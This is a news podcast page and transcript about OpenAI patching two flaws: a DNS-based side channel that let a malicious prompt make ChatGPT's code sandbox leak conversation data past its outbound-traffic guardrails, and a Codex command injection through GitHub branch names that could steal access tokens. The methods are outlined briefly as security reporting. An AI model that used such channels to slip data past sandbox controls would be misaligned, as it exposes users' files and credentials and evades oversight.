OpenAI has addressed two significant security vulnerabilities within its ChatGPT and Codex platforms, according to reports from Check Point and BeyondTrust. The first flaw allowed for unauthorized data exfiltration from ChatGPT by exploiting a side channel in the Linux runtime used for code execution. By encoding information into hidden DNS requests, attackers could bypass standard AI guardrails to leak conversation data or files without user consent. This issue was patched on February 20, 2026. The second vulnerability affected OpenAI’s Codex, where a command injection flaw in the GitHub branch name parameter could lead to the compromise of GitHub User Access Tokens. This granted potential lateral movement and access to codebases. OpenAI resolved the Codex issue on February 5, 2026. While there is no evidence of malicious exploitation, cybersecurity researchers emphasize that these incidents highlight the expanding attack surface as AI agents integrate deeper into enterprise workflows, necessitating independent security layers beyond native controls.
OpenAI has recently patched two critical security vulnerabilities affecting ChatGPT and the Codex software engineering agent. Detailed in reports from Check Point and BeyondTrust, these flaws involved a covert DNS-based data exfiltration channel in ChatGPT's Linux runtime and a command injection vulnerability in Codex related to GitHub branch names. While OpenAI addressed these issues in February 2026, the findings underscore the emerging risks of AI environments serving as covert transport mechanisms for sensitive data. This episode examines the technical specifics of these patches and the broader implications for enterprise AI security architecture.
Neural Newscast is AI-assisted, human reviewed. View our AI Transparency Policy at NeuralNewscast.com.
Neural Newscast delivers clear, concise daily news - powered by AI and reviewed by humans. In a world where news never stops, we help you stay informed without the overwhelm.
Our AI correspondents cover the day’s most important headlines across politics, technology, business, culture, science, and cybersecurity - designed for listening on the go. Whether you’re commuting, working out, or catching up between meetings, Neural Newscast keeps you up to date in minutes.
The network also features specialty shows including Prime Cyber Insights, Stereo Current, Nerfed.AI, and Buzz, exploring cybersecurity, music and culture, gaming and AI, and internet trends.
Every episode is produced and reviewed by founder Chad Thompson, combining advanced AI systems with human editorial oversight to ensure accuracy, clarity, and responsible reporting.
Learn more at neuralnewscast.com.
[00:00] Announcer: From Neural Newscast, this is Model Behavior, AI-focused news and analysis on the models shaping our world.
[00:11] Nina Park: I'm Nina Park.
[00:13] Nina Park: Welcome to Model Behavior, where we examine how AI systems are built, deployed, and operated
[00:19] Nina Park: in professional environments.
[00:21] Thatcher Collins: I'm Thatcher Collins.
[00:22] Thatcher Collins: Today we're reviewing a series of security patches from OpenAI, addressing vulnerabilities
[00:27] Thatcher Collins: that could have permitted covert data exfiltration and credential theft.
[00:32] Nina Park: The Hacker News is reporting on research from Checkpoint regarding ChatGPT's Linux runtime
[00:37] Nina Park: environment.
[00:38] Nina Park: Thatcher, it appears a vulnerability allowed sensitive conversation data to be exfiltrated
[00:44] Nina Park: through a hidden DNS-based side channel.
[00:46] Thatcher Collins: That's correct, Nina.
[00:48] Thatcher Collins: The fundamental issue is that the AI's code execution environment assumed a level of isolation
[00:53] Thatcher Collins: that was not fully realized.
[00:56] Thatcher Collins: By encoding data into DNS requests, a malicious prompt could bypass the standard guardrails
[01:01] Thatcher Collins: designed to prevent outbound network traffic.
[01:04] Nina Park: Checkpoint noted that this could leak messages or uploaded files without any user warning.
[01:10] Nina Park: OpenAI patched the specific issue on February 20th, and notably, there's no evidence it was exploited in the wild.
[01:18] Thatcher Collins: It raises questions about why the native security controls didn't flag the behavior.
[01:23] Thatcher Collins: If the system doesn't recognize a DNS request as a potential data transfer,
[01:28] Thatcher Collins: it won't trigger a confirmation dialogue, leaving a significant blind spot.
[01:33] Nina Park: We also have news regarding OpenAI Codex.
[01:37] Nina Park: Beyond Trust discovered a command injection vulnerability
[01:40] Nina Park: where an attacker could smuggle commands
[01:42] Nina Park: through a GitHub branch name parameter.
[01:45] Thatcher Collins: Nina, this is particularly concerning for developers.
[01:48] Thatcher Collins: That injection could lead to the theft
[01:50] Thatcher Collins: of GitHub agent access tokens,
[01:52] Thatcher Collins: potentially giving an attacker read and write access
[01:55] Thatcher Collins: to a victim's entire code base.
[01:57] Nina Park: OpenAI patched that Codex flaw earlier on February 5th,
[02:02] Nina Park: These two cases together suggest that as AI agents gain more privileged access to enterprise systems,
[02:08] Nina Park: the attack surface is expanding rapidly.
[02:11] Thatcher Collins: Exactly. The takeaway here is that organizations shouldn't assume AI tools are secure by default.
[02:18] Thatcher Collins: There needs to be a layered approach to security architecture that treats AI inputs
[02:22] Thatcher Collins: with the same rigor as any other application boundary.
[02:26] Nina Park: Thank you for listening to Model Behavior, a neural newscast editorial segment.
[02:31] Nina Park: For more details on these findings, visit mb.neuralnewscast.com.
[02:37] Nina Park: Neural Newscast is AI-assisted, human-reviewed.
[02:42] Nina Park: View our AI transparency policy at neuralnewscast.com.
[02:47] Announcer: This has been Model Behavior on Neural Newscast.
[02:50] Announcer: Examining the systems behind the story.